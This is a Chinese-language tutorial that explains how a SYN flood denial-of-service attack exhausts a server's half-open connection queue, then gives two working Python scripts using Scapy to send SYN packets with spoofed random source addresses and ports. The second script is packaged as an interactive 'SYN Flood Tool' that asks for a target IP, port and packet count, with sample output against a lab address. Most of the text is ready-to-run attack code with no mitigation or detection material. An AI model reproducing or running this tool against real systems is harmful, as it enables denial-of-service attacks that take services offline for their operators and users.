SYN泛洪攻擊(SYN Flood)是一種比較常用的DoS方式之一。通過發送大量僞造的Tcp連接請求,使被攻擊主機資源耗盡(通常是CPU滿負荷或者內存不足) 的攻擊方式。
SYN攻擊是客戶端向服務器發送SYN報文之後就不再響應服務器迴應的報文,由於服務器在處理TCP請求時,會在協議棧留一塊緩衝區來存儲握手的過程,如果超過一定的時間沒有接收到客戶端的報文,那麼本次連接在協議棧中存儲的數據就會被丟棄。攻擊者如果利用這段時間發送了大量的連接請求,全部掛起在半連接狀態,這樣將不斷消耗服務器資源,直到拒接服務。
scapy是一個功能強大網絡數據包處理程序,包括對數據包的嗅探、解析和構造。本文即使用其數據包構造功能,實現syn flooding攻擊。
Python代碼如下所示:
from scapy.all import *
import random
def synFlood():
for i in range(10000):
#構造隨機的源IP
src='%i.%i.%i.%i'%(
random.randint(1,255),
random.randint(1, 255),
random.randint(1, 255),
random.randint(1, 255)
)
#構造隨機的端口
sport=random.randint(1024,65535)
IPlayer=IP(src=src,dst='192.168.37.130')
TCPlayer=TCP(sport=sport,dport=80,flags="S")
packet=IPlayer/TCPlayer
send(packet)
if __name__ == '__main__':
synFlood()
結果如下:
完善的Python代碼如下:
from scapy.all import *
import random
#生成隨機的IP
def randomIP():
ip=".".join(map(str,(random.randint(0,255) for i in range(4))))
return ip
#生成隨機端口
def randomPort():
port=random.randint(1000,10000)
return port
#syn-flood
def synFlood(count,dstIP,dstPort):
total=0
print("Packets are sending ...")
for i in range(count):
#IPlayer
srcIP=randomIP()
dstIP=dstIP
IPlayer = IP(src=srcIP,dst=dstIP)
#TCPlayer
srcPort=randomPort()
TCPlayer = TCP(sport=srcPort, dport=dstPort, flags="S")
#發送包
packet = IPlayer / TCPlayer
send(packet)
total+=1
print("Total packets sent: %i" % total)
#顯示的信息
def info():
print("#"*30)
print("# Welcome to SYN Flood Tool #")
print("#"*30)
#輸入目標IP和端口
dstIP = input("Target IP : ")
dstPort = int(input("Target Port : "))
return dstIP, dstPort
if __name__ == '__main__':
dstIP, dstPort=info()
count=int(input("Please input the number of packets:"))
synFlood(count,dstIP,dstPort)
結果如下:
##############################
# Welcome to SYN Flood Tool #
##############################
Target IP : 192.168.37.2
Target Port : 80
Please input the number of packets:8
Packets are sending ...
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
Total packets sent: 8